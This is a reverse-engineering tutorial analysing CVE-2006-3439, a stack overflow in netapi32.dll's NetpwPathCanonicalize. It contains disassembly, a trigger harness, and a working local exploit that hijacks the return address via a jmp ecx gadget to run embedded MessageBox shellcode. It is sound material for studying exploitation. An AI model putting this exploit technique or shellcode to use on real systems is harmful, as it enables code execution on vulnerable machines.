

Vulnerability Overview

2022-08-25 19:29  Author: rkvir逆向工程學院 (rkvir Reverse Engineering Academy)

Author: 黑蛋


The case analysed here is CVE-2006-3439, a stack overflow in the NetpwPathCanonicalize function of the system library NETAPI32.DLL. The function concatenates two strings. The root cause is that the bounds check the function performs on its arguments uses wcslen, which counts wide characters, while the stack buffer was sized in bytes as if for ASCII; a caller can therefore pass in twice as many bytes as the buffer holds and overflow it. The vulnerable function in this DLL is analysed below.

Step 1: drag the DLL into 32-bit IDA, wait for it to finish loading, and search the function window for NetpwPathCanonicalize:




Step 2: locate the function that actually triggers the bug (step into it gradually and see where the exception occurs):



Step 3: enter this call:



Step 4: analyse the function. Assume the two string arguments passed in are (path, prefix):

; int __stdcall sub_7517FC68(wchar_t *Str, wchar_t *Source, wchar_t *, int, int)
.text:7517FC68 sub_7517FC68 proc near               ; CODE XREF: NetpwPathCanonicalize+74↑p
.text:7517FC68
.text:7517FC68 var_416         = word ptr -416h
.text:7517FC68 Dest            = word ptr -414h
.text:7517FC68 Str             = dword ptr  8
.text:7517FC68 Source          = dword ptr  0Ch
.text:7517FC68 arg_8           = dword ptr  10h
.text:7517FC68 arg_C           = dword ptr  14h
.text:7517FC68 arg_10          = dword ptr  18h
.text:7517FC68
.text:7517FC68                 push    ebp
.text:7517FC69                 mov     ebp, esp
.text:7517FC6B                 sub     esp, 414h       ; allocate the stack buffer, 0x414 bytes
.text:7517FC71                 push    ebx
.text:7517FC72                 push    esi
.text:7517FC73                 xor     esi, esi
.text:7517FC75                 push    edi
.text:7517FC76                 cmp     [ebp+Str], esi
.text:7517FC79                 mov     edi, ds:__imp_wcslen
.text:7517FC7F                 mov     ebx, 411h       ; bound used by the length checks
.text:7517FC84                 jz      short loc_7517FCED
.text:7517FC86                 push    [ebp+Str]       ; prefix string
.text:7517FC89                 call    edi ; __imp_wcslen
.text:7517FC8B                 mov     esi, eax        ; length of prefix, in Unicode characters
.text:7517FC8D                 pop     ecx
.text:7517FC8E                 test    esi, esi
.text:7517FC90                 jz      short loc_7517FCF4
.text:7517FC92                 cmp     esi, ebx
.text:7517FC94                 ja      loc_7517FD3E
.text:7517FC9A                 push    [ebp+Str]       ; Source
.text:7517FC9D                 lea     eax, [ebp+Dest]
.text:7517FCA3                 push    eax             ; Dest
.text:7517FCA4                 call    ds:__imp_wcscpy
.text:7517FCAA                 mov     ax, [ebp+esi*2+var_416]
.text:7517FCB2                 pop     ecx
.text:7517FCB3                 cmp     ax, 5Ch
.text:7517FCB7                 pop     ecx
.text:7517FCB8                 jz      short loc_7517FCD5
.text:7517FCBA                 cmp     ax, 2Fh
.text:7517FCBE                 jz      short loc_7517FCD5
.text:7517FCC0                 lea     eax, [ebp+Dest]
.text:7517FCC6                 push    offset asc_751717B8 ; "\\"
.text:7517FCCB                 push    eax             ; Dest
.text:7517FCCC                 call    ds:__imp_wcscat
.text:7517FCD2                 pop     ecx
.text:7517FCD3                 inc     esi
.text:7517FCD4                 pop     ecx
.text:7517FCD5
.text:7517FCD5 loc_7517FCD5:                           ; CODE XREF: sub_7517FC68+50↑j
.text:7517FCD5                                         ; sub_7517FC68+56↑j
.text:7517FCD5                 mov     eax, [ebp+Source]
.text:7517FCD8                 mov     ax, [eax]
.text:7517FCDB                 cmp     ax, 5Ch
.text:7517FCDF                 jz      short loc_7517FCE7
.text:7517FCE1                 cmp     ax, 2Fh
.text:7517FCE5                 jnz     short loc_7517FCF4
.text:7517FCE7
.text:7517FCE7 loc_7517FCE7:                           ; CODE XREF: sub_7517FC68+77↑j
.text:7517FCE7                 add     [ebp+Source], 2
.text:7517FCEB                 jmp     short loc_7517FCF4
.text:7517FCED ; ---------------------------------------------------------------------------
.text:7517FCED
.text:7517FCED loc_7517FCED:                           ; CODE XREF: sub_7517FC68+1C↑j
.text:7517FCED                 mov     [ebp+Dest], si
.text:7517FCF4
.text:7517FCF4 loc_7517FCF4:                           ; CODE XREF: sub_7517FC68+28↑j
.text:7517FCF4                                         ; sub_7517FC68+7D↑j ...
.text:7517FCF4                 push    [ebp+Source]    ; path string
.text:7517FCF7                 call    edi ; __imp_wcslen
.text:7517FCF9                 add     eax, esi        ; length of prefix + '\' + path
.text:7517FCFB                 pop     ecx
.text:7517FCFC                 cmp     eax, ebx        ; second bounds check: ebx = 0x411, but after the two concatenations this is a count of Unicode characters, so up to 0x822 bytes can be written here
.text:7517FCFE                 ja      short loc_7517FD3E
.text:7517FD00                 push    [ebp+Source]    ; Source
.text:7517FD03                 lea     eax, [ebp+Dest]
.text:7517FD09                 push    eax             ; Dest
.text:7517FD0A                 call    ds:__imp_wcscat
.text:7517FD10                 pop     ecx
.text:7517FD11                 lea     eax, [ebp+Dest]
.text:7517FD17                 pop     ecx
.text:7517FD18                 push    eax
.text:7517FD19                 call    sub_7518AE95
.text:7517FD1E                 lea     eax, [ebp+Dest]
.text:7517FD24                 push    eax             ; Name
.text:7517FD25                 call    sub_7518AEB3
.text:7517FD2A                 test    eax, eax
.text:7517FD2C                 jnz     short loc_7517FD43
.text:7517FD2E                 lea     eax, [ebp+Dest]

Step 5: we conclude that 0x822 bytes can be passed in while the stack buffer is only 0x411 bytes, which means that for either the path argument or the prefix argument we can pass in twice the expected amount of data. We then find, however, that a function called before the vulnerable one already checks the length of the prefix argument, so only the path argument can be used:
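To make the unit mismatch concrete, here is an added illustration (not code from the original post or from netapi32.dll): the two length checks of sub_7517FC68 re-expressed in C, counting characters exactly as the listing does, next to a corrected check that compares the bytes wcscpy and wcscat will actually write against the size of Dest. The buffer size 0x414 and the bound 0x411 are taken from the listing; the function names check_canonicalize and evaluate, the WCHAR_BYTES constant and the inputs are constructed for this example.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <wchar.h>

#define DEST_BYTES   0x414u  /* Dest buffer: "sub esp, 414h" in the listing */
#define LIMIT_WCHARS 0x411u  /* bound in ebx that both length checks compare against */
#define WCHAR_BYTES  2u      /* Windows wchar_t is 2 bytes; fixed so the arithmetic is host-independent */
#define MAX_IN       0x800u  /* constructed inputs never exceed this many characters */

struct verdict {
    bool   original_accepts; /* the listing's check: character count <= 0x411 */
    bool   fixed_accepts;    /* corrected check: bytes to be written <= sizeof(Dest) */
    size_t bytes_written;    /* prefix + separator + path + terminator, in bytes */
    size_t overflow_bytes;   /* how far past the end of Dest the copy would run */
};

/* Follow the control flow of sub_7517FC68 for two inputs, counting instead of copying. */
static struct verdict check_canonicalize(const wchar_t *prefix, const wchar_t *path)
{
    struct verdict v = {0};
    size_t n = wcslen(prefix);                          /* esi = wcslen(prefix) */
    bool ok = true;
    if (n > 0) {                                        /* test esi, esi / jz loc_7517FCF4 */
        ok = n <= LIMIT_WCHARS;                         /* cmp esi, ebx / ja loc_7517FD3E */
        if (prefix[n - 1] != L'\\' && prefix[n - 1] != L'/')
            n++;                                        /* wcscat(Dest, "\\"); inc esi */
        if (path[0] == L'\\' || path[0] == L'/')
            path++;                                     /* add [ebp+Source], 2 */
    }
    n += wcslen(path);                                  /* eax = wcslen(path) + esi */
    v.original_accepts = ok && n <= LIMIT_WCHARS;       /* cmp eax, ebx / ja loc_7517FD3E */
    /* The bug: the limit is compared against a character count, but Dest is sized in bytes. */
    v.bytes_written  = (n + 1) * WCHAR_BYTES;
    v.fixed_accepts  = v.bytes_written <= DEST_BYTES;
    v.overflow_bytes = v.bytes_written > DEST_BYTES ? v.bytes_written - DEST_BYTES : 0;
    return v;
}

/* Constructed inputs: prefix_len copies of L'b' and path_len copies of L'a', no separators,
   mirroring the 0x62/0x61 fill pattern of the post's test program. */
struct verdict evaluate(size_t prefix_len, size_t path_len)
{
    static wchar_t prefix[MAX_IN + 1], path[MAX_IN + 1];
    assert(prefix_len <= MAX_IN && path_len <= MAX_IN);
    wmemset(prefix, L'b', prefix_len); prefix[prefix_len] = L'\0';
    wmemset(path,   L'a', path_len);   path[path_len]     = L'\0';
    return check_canonicalize(prefix, path);
}
```

With the post's test sizes (0x7f prefix characters, 0x18f path characters) the original check accepts the input while the copy writes 0x420 bytes into a 0x414-byte buffer, running 12 bytes past Dest and over the saved frame; the corrected check rejects it.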




II. Environment Setup


Environment        Configuration
System             WinXP
Compiler           VC++ 6.0
Debuggers          x86 IDA, x86DBG
Project settings   Win32 + Release
File               netapi32.dll (DLL file)


III. Vulnerability Analysis

The test code is as follows. I load the unpatched DLL directly: the DLL is loaded with LoadLibrary, the address of NetpwPathCanonicalize is obtained with GetProcAddress, and the function is called through a function pointer with two arguments, one filled entirely with 0x61 and the other entirely with 0x62, both terminated with 0x00, to observe where the overflow happens:

#include <windows.h>
#include <string.h>

/* NetpwPathCanonicalize(PathName, Outbuf, OutbufLen, Prefix, PathType, Flags), stdcall;
   the pointer type matches the six arguments passed below */
typedef DWORD (__stdcall *MYPROC)(char *, char *, DWORD, char *, long *, DWORD);

int main()
{
    char path[0x320];
    char can_path[0x440];
    int maxbuf = 0x440;
    char prefix[0x100];
    long pathtype = 44;
    // load the vulnerable netapi32.dll, taken from a Win2K SP4 host
    HINSTANCE LibHandle;
    MYPROC Trigger;
    char dll[] = "./netapi32.dll"; // mind the path
    char VulFunc[] = "NetpwPathCanonicalize";
    LibHandle = LoadLibrary(dll);
    Trigger = (MYPROC)GetProcAddress(LibHandle, VulFunc);
    memset(path, 0, sizeof(path));
    memset(path, 'a', sizeof(path) - 2);     // 0x61 fill; the two trailing zero bytes terminate the wide string
    memset(prefix, 0, sizeof(prefix));
    memset(prefix, 'b', sizeof(prefix) - 2); // 0x62 fill
    (Trigger)(path, can_path, maxbuf, prefix, &pathtype, 0);
    FreeLibrary(LibHandle);
    return 0;
}

Build the Release binary, load it into x86dbg and press F9 to run into the program's own code:



Locate the entry of the main function:



Enter main and find the place where NetpwPathCanonicalize is called through our function pointer:



Run to the call edx, inspect the value of edx, jump to the start of NetpwPathCanonicalize and set a breakpoint there:



Run to the vulnerable function, then find the actual string-copy function and set a breakpoint on it:



Enter the target function:



Press F4 to run until just after the second wcscat call:



Inspect the stack.
At esp:



We find that the start address of our buffer on the stack is 12F294.
At ebp:



We find that bytes 4 through 8 from the end of the path string overwrite the return address. Run to the end of the function:



We find that ecx points exactly at the start of our buffer, so all we need at the overwritten return address is a jmp ecx or call ecx instruction; in netapi32.dll I found one at 751852F9:




Placing this address where the return value is overwritten redirects control flow into our buffer. Next we construct the shellcode. Below is the new code: we write our jump address, 751852F9, into positions 4 to 8 from the end of the path argument and copy our pop-up shellcode into prefix; it displays a MessageBox so we can observe the result:

#include <windows.h>
#include <string.h>

/* NetpwPathCanonicalize(PathName, Outbuf, OutbufLen, Prefix, PathType, Flags), stdcall;
   the pointer type matches the six arguments passed below */
typedef DWORD (__stdcall *MYPROC)(char *, char *, DWORD, char *, long *, DWORD);

/* 176-byte MessageBox shellcode as given in the post (11 lines of 16 bytes) */
char shellcode2[] =
    "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
    "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
    "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
    "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
    "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
    "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
    "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
    "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
    "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
    "\x53\x68\x6F\x70\x20\x20\x68\x76\x75\x6C\x74\x8B\xC4\x53\x50\x50"
    "\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90";

int main()
{
    char path[0x320];
    char can_path[0x440];
    int maxbuf = 0x440;
    char prefix[0x100];
    long pathtype = 44;
    // load the vulnerable netapi32.dll, taken from a Win2K SP4 host
    HINSTANCE LibHandle;
    MYPROC Trigger;
    char dll[] = "./netapi32.dll"; // mind the path
    char VulFunc[] = "NetpwPathCanonicalize";
    LibHandle = LoadLibrary(dll);
    Trigger = (MYPROC)GetProcAddress(LibHandle, VulFunc);
    memset(path, 0, sizeof(path));
    memset(path, 0x90, sizeof(path) - 2);     // NOP fill; the two trailing zero bytes terminate the wide string
    memset(prefix, 0, sizeof(prefix));
    memset(prefix, 0x90, sizeof(prefix) - 2);
    memcpy(prefix, shellcode2, 176);
    // bytes 8..5 from the end of path land on the saved return address: 0x751852F9
    path[0x318] = 0xF9;
    path[0x319] = 0x52;
    path[0x31A] = 0x18;
    path[0x31B] = 0x75;
    //__asm int 3
    (Trigger)(path, can_path, maxbuf, prefix, &pathtype, 0);
    FreeLibrary(LibHandle);
    return 0;
}

Observe the result: the message box appears:



Next we load the program into x86dbg again and follow the earlier steps to the vulnerable function:



Press F7 to step in and run to the end of the function:



Inspect the stack. The buffer on the stack:



At the return address:



Everything is as expected; continuing, we arrive at our shellcode:



Press F9 to run, and the message box appears.




